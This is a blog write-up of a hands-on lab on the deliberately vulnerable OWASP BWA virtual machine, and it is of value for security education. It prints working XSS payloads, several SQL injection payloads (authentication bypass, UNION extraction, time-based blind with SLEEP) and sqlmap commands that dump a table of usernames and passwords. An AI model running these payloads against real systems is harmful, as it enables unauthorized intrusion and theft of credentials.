CyberSec

Exploring Web Security with OWASP BWA

Kiran Dawadi

In this blog post, I’ll take you through my hands-on exploration of common web vulnerabilities using the OWASP Broken Web Application (BWA) virtual machine. This powerful learning environment allows security enthusiasts to practice identifying and exploiting vulnerabilities in a safe, controlled setting.

Contents hide
1. Setting Up the Environment
2. Part 1: Cross-Site Scripting (XSS)
2.1. Reflected XSS in Mutillidae II
2.2. Stored XSS in WebGoat
2.3. Stored XSS in DVWA
3. Part 2: SQL Injection (SQLi)
3.1. In-band SQLi in DVWA
3.2. Bypass Authentication in Mutillidae II
3.3. Union-based SQL injection in Mutillidae II
3.4. Blind SQL via timing in Mutillidae II
4. Part 3 – SQLMap
5. Conclusion

Setting Up the Environment

To begin, I:

  • Imported the OWASP BWA virtual machine into VirtualBox
  • Configured the network interface to NAT mode
  • Accessed the VM through the exposed IP address

Part 1: Cross-Site Scripting (XSS)

XSS vulnerabilities allow attackers to inject malicious scripts into websites that are then executed by unsuspecting users’ browsers. Let’s explore three types of XSS attacks.

Reflected XSS in Mutillidae II

Reflected XSS occurs when user input is immediately returned to the browser without proper sanitization.

I navigated to A3 - XSS tab and selected Reflected (First Order) > DNS Lookup. The page presented a query bar for DNS lookups.

Testing with a legitimate domain like google.com showed the expected behavior:

Then I tried a basic XSS payload:

<script>alert(1)</script>

The server reflected this input without sanitization, allowing the script to execute and trigger the alert:

Stored XSS in WebGoat

Stored XSS is more dangerous as the malicious script is permanently stored on the target server and executes whenever a user accesses the affected page.

First login as Tom.

Edit your street as the XSS paload. This is persistent information, so it is known as stored XSS.

After this, log in as Larry.

After logging in, search for the profile of Tom. When you view his profile, stored XSS will be triggered and the alert box will pop.

The lab was successfully completed

Stored XSS in DVWA

  • In DVWA, there is a form that we can fill up with Name and Message. I found a message board where users can post names and messages so this is an interesting place to insert our XSS payload.
  • I used this payload to steal the cookies from this website.
<script>alert(document.cookie)</script>

While visiting the page again this stored XSS is triggered.

The alert displayed the document cookies, demonstrating how an attacker could steal session cookies.

Part 2: SQL Injection (SQLi)

SQL injection allows attackers to manipulate database queries, potentially gaining unauthorized access to data or bypassing authentication.

In-band SQLi in DVWA

In this lab, there is a simple query bar where user ID is to be filled in.

Inserting random characters (.,<>;) into the query bar gave SQL error. This confirmed the presence of SQL injection in the application.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''<>;''' at line 1
  • Using the payload below, we can dump each of the users that are present in the DB.
test' OR 1=1 #
  • All user IDs matched because under the hood, it ran a SQL query like the one shown below:
SELECT first_name, surname from db where user_id='test' OR 1=1 #'

This essentially returned all the results from the database since 1=1 is true all the time.

Bypass Authentication in Mutillidae II

  • Tried the payload test' in username field, and it gave verbose SQL syntax error message.
onnect_errno: 0  
errno: 1064  
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''test''' at line 1  
client_info: 5.1.73  
host_info: Localhost via UNIX socket  

) Query: SELECT username FROM accounts WHERE username='test''; (0) [Exception]

We can even see the full SQL query that ran in the background. Let’s try to bypass the authentication.

And we are successfully authenticated as an admin user.

Union-based SQL injection in Mutillidae II

There is page for checking user details where you need to input your username and password. We used the payload admin' # to confirm the SQL injection.

Now sending a sequence of UNION SELECT payloads with varying numbers of null values until the “columns number mismatch” error is no more there.

' union select null,null,null,null,null,null,null #

1 record matched for the union-based payload above. Lets exploit this further down

Here’s how we can extract more information about the database using Union-based SQL injection.

' union select null,database(),@@version,null,null,null,null #

Blind SQL via timing in Mutillidae II

Blind SQL injection is used when error messages are suppressed but the vulnerability exists.

  • Retrieve the username at first
' UNION SELECT null, CURRENT_USER(), null, null, null, null, null #

The username is mutillidae.

Using a conditional statement, we can ask the target web server a question and return a certain value depending on the answer. For example, if we suspect that the current database user might be mutillidae, then we can ask: is the first 10 letters of the user equal to mutillidae? If yes, return 1, if no return 0.

' union select null, if (SUBSTRING(current_user(),1,10) = 'mutillidae', 1, 0), null,null, null, null, null #
  • Instead of returning 1 or 0, we can ask the web server to wait for a given number of seconds. After running this command, the server waited for like 5 seconds before sending a response.
' union select null, case SUBSTRING(current_user(),1,10) WHEN 'mutillidae' THEN
SLEEP(5) ELSE SLEEP(0) END, null, null, null, null, null #
  • In this way we can exfiltrate the whole database and other internal files as well (if the db user has access to it).

Part 3 – SQLMap

Use BurpSuite to save the request to a file named mutillidae.req.

Using sqlmap to exploit SQL injection on this URL.

~/Documents > sqlmap -r mutillidae.req --threads=5 --dbs

The sqlmap attack is successful and here are the available databases that it’s able to dump for us.

Lets pick the mutillidae database and issue the following command to see the tables associated with that database (-D is to specify a database, –tables is to show all tables within that database):

~/Documents > sqlmap -r mutillidae.req --threads=5 -D mutillidae --tables
  • Lets find the columns that is available under this table.
sqlmap -r mutillidae.req --threads=5 -D mutillidae -T accounts --columns
  • Now its time to dump all the username and password related to this table using the following command:
sqlmap -r mutillidae.req --threads=5 -D mutillidae -T accounts -C username,password --dump

Conclusion

This hands-on exploration of OWASP BWA demonstrates just how vulnerable web applications can be when security is not properly implemented. Cross-site scripting and SQL injection remain among the most common and dangerous web vulnerabilities, allowing attackers to steal data, bypass authentication, and potentially take control of systems.

Hoping to getting my hands dirty with other labs inside BWA very soon!

Kiran Dawadi

Founder of cybersecnerds.com. Cybersecurity professional with 3+ years experience in offensive web security, cloud security and building systems. I am a Linux envagelist and highly interested in source-code auditing. You will find me reading InfoSec blogs most of the time.

You May Also Like

FFUF — Everything You Need To Know

Kiran Dawadi
Cybersecurity Compliance

An Overview of Cybersecurity Compliance

Kiran Dawadi

Cookie’s SameSite Attribute vs CSRF — Demystified

Kiran Dawadi
Subscribe
Notify of
guest

0 Comments
Inline Feedbacks
View all comments